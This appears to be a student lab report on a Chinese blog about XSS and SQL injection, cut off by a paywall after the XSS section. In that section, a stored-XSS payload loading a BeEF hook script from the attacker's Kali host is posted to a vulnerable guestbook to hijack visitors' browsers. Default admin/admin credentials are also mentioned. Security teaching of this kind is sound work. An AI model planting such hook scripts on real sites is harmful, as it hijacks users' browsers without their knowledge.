【实验报告】实验三 XSS和SQL注入

最新推荐文章于 2024-05-10 02:26:39 发布
最新推荐文章于 2024-05-10 02:26:39 发布
阅读量1.7k 收藏 8
点赞数 1
分类专栏: 笔记 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52108440/article/details/111143258
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。
由于beef生成的看不见,无法截图。

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板:
<script src="http://Kali的IP地址:3000/hook.js"></script>

在这里插入图片描述
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
这样我们就可以对被劫持的客户端发出一个command。
current browser>commands>browser>hooked domain>redirect domain
在这里插入图片描述

在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

答:实验中的属于存储型XXS攻击

SQL注入部分:DVWA+SQLmap+Mysql注入实战

启动Metasploitable2虚拟机。

环境准备:


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  m0_52108440
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    8
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
实验XSSSQL注入

				
			

			

				

					weixin_51458001的博客
				

				

					11-24
					
					558
					
				

			

		

		

			
				
一、什么是XSS?
1、XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
2、恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
3、XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。
4、另一

			
		

	



                

              
                



	

		

			

				
					
网络安全技术+XSS攻击和SQL注入攻击

				
			

			

				

					04-11
				

			

		

		

			
				
XSS攻击和SQL注入攻击
网络安全技术初级学生

			
		

	



                


  
              

                


	

		

			

				
					
web安全技术-实验七、跨站脚本攻击(xss)(反射型).doc

				
			

			

				

					08-20
				

			

		

		

			
				
web安全技术-实验七、跨站脚本攻击(xss)(反射型)

			
		

	





	

		

			

				
					
网络安全最新XSS基础环境及实验演示教程(适合新手)_xxs实验步骤,2024年互联网大厂网络安全笔经

				
			

			

				

					2401_84545497的博客
				

				

					05-10
					
					855
					
				

			

		

		

			
				
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

			
		

	



		

			
		



	

		

			

				
					
XSS跨站脚本攻击原理与实践 信息安全概论学习心得

				
			

			

				

					zz13634628165的博客
				

				

					05-26
					
					2468
					
				

			

		

		

			
				
一、实验目的

本次实验所涉及并要求掌握的知识点。

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶..

			
		

	





	

		

			

				
					
[实验]xss dvwa

				
			

			

				

					foolisheddy
				

				

					03-19
					
					2130
					
				

			

		

		

			
				
初次接触xss

反射型XSS

存储型XSS

漏洞利用

参考list

			
		

	





	

		

			

				
					
SQL注入总结

				
			

			

				

					m0_47668487的博客
				

				

					03-30
					
					1030
					
				

			

		

		

			
				
SQL注入总结
SQL注入原理

数字型
字符型

SQL注入分类

布尔盲注
union注入
报错注入
延时注入
宽字节注入
堆叠注入
二次注入
cookie注入
User-Agent注入
万能密码

防止SQL注入

严格的数据类型
特殊字符转义
使用预编译语句
框架技术
存储过程


...

			
		

	





	

		

			

				
					
基于SQL注入漏洞的总结与归纳(个人学习 整理归纳复习

				
			

			

				

					qq_57774303的博客
				

				

					01-25
					
					1303
					
				

			

		

		

			
				
SQL注入常见的web漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。像这样我们输入?id=1 我们可以获得id=1的信息 这就是sql注入漏洞,可以通过sql的命令行去后台直接查询信息第二节 SQL注入的产生原因原因:在前后端数据的交互中,前端的数据传到后台处理时,没有做严格的判断,导致其传入的数据拼接到SQL语句中,被当成SQL语句的一部分执行,从而导致数据库受损,信息丢失。

			
		

	





	

		

			

				
					
网络渗透测试 XSSSQL注入

				
			

			

				

					12-02
				

			

		

		

			
				
【网络渗透测试 XSSSQL注入】的实验旨在深入理解网络安全中的两种常见攻击手法,并学习如何防范。XSS(跨站脚本攻击)和SQL注入都是针对Web应用的安全威胁,主要利用了程序处理用户输入的疏忽。  XSS攻击是攻击者...

			
		

	





	

		

			

				
					
《计算机网络安全实验实验报告1

				
			

			

				

					11-01
				

			

		

		

			
				
【计算机网络安全实验实验报告1主要探讨了DVWA(Damn Vulnerable Web Application)中的PHP与MySQL环境下的SQL注入漏洞。该实验旨在让学生理解和掌握SQL注入的原理、利用方法以及防御措施。以下是实验涉及的主要...

			
		

	





	

		

			

				
					
SQL注入相关实验报告.doc

				
			

			

				

					01-05
				

			

		

		

			
				
将恶意的SQL命令插入到输入域名或页面请求的查询字符串注入到后台数据库,输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

			
		

	





	

		

			

				
					
基于php软件实验报告管理系统设计与实现.docx

				
			

			

				

					11-07
				

			

		

		

			
				
安全性方面,需注意SQL注入XSS攻击等常见的Web安全问题,通过参数化查询、输入验证等手段防止数据泄露。  总的来说,基于PHP的软件实验报告管理系统设计与实现,旨在解决高校实验报告管理的痛点,提高工作效率,...

			
		

	





	

		

			

				
					
南京邮电大学-课程实验-Web安全-实验报告和源码说明.zip

					
最新发布

				
			

			

				

					05-12
				

			

		

		

			
				
【标题】"南京邮电大学-课程实验-Web安全-实验报告和源码说明.zip" 涵盖了Web安全领域的课程实验,其中包含了实验报告和源码的详细解释,旨在帮助学生深入理解和掌握Web应用的安全防护技术。该资源可能包括了HTML、...

			
		

	





	

		

			

				
					
web安全技术-实验六、文件上传漏洞.doc

				
			

			

				

					08-20
				

			

		

		

			
				
它包含各种常见的Web安全漏洞,如SQL注入XSS攻击以及我们关注的文件上传漏洞,提供了一个实践和学习安全漏洞的平台。  3. **安全等级设置**:DVWA的安全等级分为多个级别,从"low"(低)到"impossible"(不可能)...

			
		

	





	

		

			

				
					
网络攻防-XSS攻击实验

				
			

			

				

					qq_64389397的博客
				

				

					01-07
					
					1791
					
				

			

		

		

			
				
1.在传播病毒的同时,将病毒也复制在about me中,这样这段代码就会一直存在,所有访问都在自己的about字段添加这段代码,这样就能一直传第下去。如果不添加If判断,如果时samy自己进入个人简介,也会触发JavaScript代码,但是因为post的about me字段为空,那么这段JavaScript代码将会被清空,所以需要加上这段if判断,这样当当前用户是samy时,不会触发。3.由获取的信息可知,接口的url地址,post提交数据的方式,使用这些信息填入JavaScript框架的对应信息中。

			
		

	





	

		

			

				
					
XSS漏洞攻击报告

				
			

			

				

					vsdfbhsdhsdfh的博客
				

				

					09-13
					
					730
					
				

			

		

		

			
				
XSS漏洞攻击报告

			
		

	





	

		

			

				
					
XSS跨站脚本攻击以及SQL注入攻击实验报告

				
			

			

				

					AC1145的博客
				

				

					11-28
					
					2040
					
				

			

		

		

			
				
XSS跨站脚本攻击以及SQL注入攻击实验报告
XSS跨站脚本攻击
学号/工号查询
输入正确的信息后,我们会得到正确的输出结果。如果输入的名字在数据库中不存在,则无法查询到结果。

XSS跨站脚本攻击
根据判断,我们可以用一段JavaScript语言写的代码“”或者“SQL注入攻击
学号查询功能的SQL注入攻击
我们先查看一下query.php程序代码

发现其19行,33行,47行查询语句是一样的...

			
		

	





	

		

			

				
					
网络攻防实践实验报告

				
			

			

				

					qq_48521772的博客
				

				

					06-02
					
					1871
					
				

			

		

		

			
				
在本次实践中,我们亲自尝试了一次XSS攻击和SQL注入攻击,发现了常见的输入框中的漏洞,提醒了我们:在开发Web应用的时候,要对从客户端传输的数据进行检查和处理,确保数据的安全,防止因一些漏洞而导致网站受到攻击。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值